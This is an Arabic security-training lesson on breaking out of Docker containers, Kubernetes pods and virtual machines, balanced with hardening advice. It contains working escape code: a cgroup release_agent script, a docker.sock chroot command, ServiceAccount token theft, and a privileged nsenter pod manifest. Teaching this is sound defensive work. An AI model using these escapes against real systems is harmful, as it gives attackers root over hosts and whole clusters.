Cyber Operations Academy logo
أكاديمية العمليات السيبرانية
Red / Blue / Ops
الرئيسية/الدروس/L24
الفرق الحمراء — الهجومخبير90mL24

الهروب من الحاويات وأنظمة المحاكاة الافتراضية

اختراق Docker، الهروب من Kubernetes، ومن الأنظمة الوهمية

#Docker#K8s#runc#Hypervisor

من الحاوية إلى السيرفر — كسر العزل

تشبيه — شرح مبسط
الحاوية مثل سفينة في ميناء: لكل سفينة حدودها، لكنها تشترك في الميناء (الـ host kernel). لو وجد القرصان شقّاً في القاع، خرج من سفينته إلى ميناء كامل فيه عشرات السفن الأخرى.
هام
يُشرح هنا للوعي الدفاعي و لاختبارات الاختراق المرخّصة. تطبيقها على بيئات إنتاج لجهات أخرى = جريمة فيدرالية.

ما الذي يعزل الحاوية؟

  • Namespaces: PID, network, mount, UTS, IPC, user, cgroup, time. كل واحد يعزل نوعاً.
  • cgroups: حدود الموارد (CPU, memory, io).
  • capabilities: تقسيم صلاحيات root إلى ~40 صلاحية مستقلة.
  • seccomp-bpf: قائمة بيضاء لـ syscalls المسموحة.
  • AppArmor / SELinux: MAC إجباري.
  • UID mapping: user namespace يجعل root الحاوية = uid عادي على الـ host.

سقوط أي واحدة من هذه = طبقة دفاع أقل.

Misconfigurations — الطريق الأقصر للهروب

1) Privileged container

bash
docker run --privileged ...
# يعطي كل الـ capabilities + access للـ devices = root كامل على host
escape via cgroup release_agent (classic)
mkdir /tmp/cgrp && mount -t cgroup -o rdma cgroup /tmp/cgrp
mkdir /tmp/cgrp/x
echo 1 > /tmp/cgrp/x/notify_on_release
host_path=$(sed -n 's/.*\perdir=\([^,]*\).*/\1/p' /etc/mtab)
echo "$host_path/cmd" > /tmp/cgrp/release_agent
echo '#!/bin/sh' > /cmd
echo 'ps -ef > /tmp/host_ps' >> /cmd
chmod +x /cmd
sh -c "echo \$\$ > /tmp/cgrp/x/cgroup.procs"
# الـ release_agent يُنفّذ على host = root

2) Mount sensitive paths

  • /var/run/docker.sock داخل الحاوية = تحكم كامل بالـ Docker daemon = root على host.
  • /proc أو /sys من host.
  • / الكامل (yes, this happens).
docker.sock escape
# لو /var/run/docker.sock مركّب
docker -H unix:///var/run/docker.sock run -v /:/host --privileged alpine \
  chroot /host bash
# أنت الآن root على الـ host

3) Dangerous capabilities

  • CAP_SYS_ADMIN — تقريباً = root.
  • CAP_SYS_PTRACE — اربط نفسك بعملية host (لو PID namespace مكسور).
  • CAP_SYS_MODULE — حمّل kernel module.
  • CAP_DAC_READ_SEARCH — اقرأ كل ملفات الـ host.
  • CAP_NET_ADMIN — تلاعب بشبكة host.

ثغرات شهيرة في الـ runtime

  • CVE-2019-5736 (runc) — كتابة فوق ثنائي runc من داخل الحاوية → كل تشغيل تالٍ يُنفّذ كود المهاجم على host.
  • CVE-2022-0185 (Linux kernel) — heap overflow في fs context → escape مع CAP_SYS_ADMIN.
  • CVE-2022-0492 (cgroups v1) — إساءة release_agent بدون CAP_SYS_ADMIN.
  • Leaky Vessels (CVE-2024-21626) — runc + BuildKit، fd handle مسرّب يصل لـ host.
  • CVE-2024-23653 (BuildKit) — هروب أثناء بناء الـ image.
القاعدة الذهبية
ضع داخل الـ image سياسة patch صارمة: حدّث runtime (containerd, runc, BuildKit) فوراً عند صدور CVE.

Kubernetes — هروب من Pod

سطح الهجوم

  • ServiceAccount token داخل /var/run/secrets/kubernetes.io/serviceaccount/.
  • kubelet API غير محمي على :10250.
  • HostPath volumes تركيب مسارات حساسة.
  • privileged: true أو hostNetwork: true أو hostPID: true.
  • Insecure RBAC — ServiceAccount يستطيع create pods, exec, secrets.
quick triage from inside a pod
# اقرأ الـ token
TOKEN=$(cat /var/run/secrets/kubernetes.io/serviceaccount/token)
APISERVER=https://kubernetes.default.svc

# تحقّق من الصلاحيات
kubectl auth can-i --list

# أداة شاملة
peirates
amicontained -v
deepce.sh

تقنيات الـ escalation داخل k8s

  1. Create privileged pod يربط / الـ node.
  2. Use hostPath في الـ pod الجديد للوصول لـ /etc/kubernetes/pki ← مفاتيح cluster-admin.
  3. أو read all secrets في الـ namespaces.
  4. أو steal service account tokens من pods أخرى.
  5. التحرك إلى etcd = كل الـ cluster.
malicious privileged pod
apiVersion: v1
kind: Pod
metadata: { name: pwn }
spec:
  hostPID: true
  hostNetwork: true
  containers:
  - name: pwn
    image: alpine
    securityContext: { privileged: true }
    command: ["nsenter", "--target", "1", "--mount", "--uts", "--ipc", "--net", "--pid", "--", "bash"]
    volumeMounts: [{ name: host, mountPath: /host }]
  volumes: [{ name: host, hostPath: { path: / } }]
الدفاع — k8s
  1. Pod Security Standards: restricted profile افتراضياً.
  2. OPA Gatekeeper / Kyverno لمنع pods خطرة.
  3. RBAC بأقل صلاحيات + لا cluster-admin لـ ServiceAccounts.
  4. عطّل auto-mount الـ ServiceAccount tokens.
  5. NetworkPolicy: deny-all + allow-list.
  6. kubelet: authn=Webhook, anonymous-auth=false، شهادات mTLS.
  7. Image signing (cosign + sigstore policy).
  8. Runtime monitoring: Falco, Tracee, Tetragon.
  9. cluster forensics: kube-bench, kube-hunter, krane.

VM / Hypervisor Escapes — الجائزة الكبرى

الهروب من VM إلى hypervisor (Xen, KVM, VMware, Hyper-V) نادر و قاتل — يعطي تحكماً بكل VMs على نفس الـ host.

أمثلة تاريخية

  • VENOM (CVE-2015-3456) — QEMU floppy controller.
  • BlueKeep on Hyper-V.
  • Pwn2Own escapes سنوياً على VMware Workstation / VirtualBox.
  • L1TF, Foreshadow, MDS — side-channel attacks ضد عزل الـ CPU.

الدفاع

  • Patch الـ hypervisor أسرع من patch الـ guests (نطاق التأثير أكبر).
  • عطّل الميزات غير الضرورية (USB passthrough, shared folders).
  • استخدم microVMs (Firecracker, Kata Containers) للـ workloads المتعددة المستأجرين.
  • افصل tenants على hosts فيزيائية مختلفة عند الحساسية القصوى.

مبادئ تصميم آمن للحاويات

  1. Distroless / scratch images — لا shell، لا apt، لا أي أداة للهجوم.
  2. Non-root user داخل الحاوية + USER nobody.
  3. readOnlyRootFilesystem: true.
  4. Drop ALL capabilities ثم أضف فقط ما يلزم.
  5. seccomp profile صارم (RuntimeDefault على الأقل).
  6. AppArmor / SELinux profile لكل خدمة.
  7. User namespace remapping — root الحاوية ≠ root host.
  8. افحص الـ images بـ trivy / grype / dockle قبل النشر.
  9. وقّع الـ images بـ cosign و افرض signature verification في k8s.
  10. قلّل سطح الـ host: Bottlerocket, Talos, Flatcar.
السابق
استغلال ثغرات الذاكرة والملفات التنفيذية
التالي
هجمات بروتوكولات الشبكة المتقدمة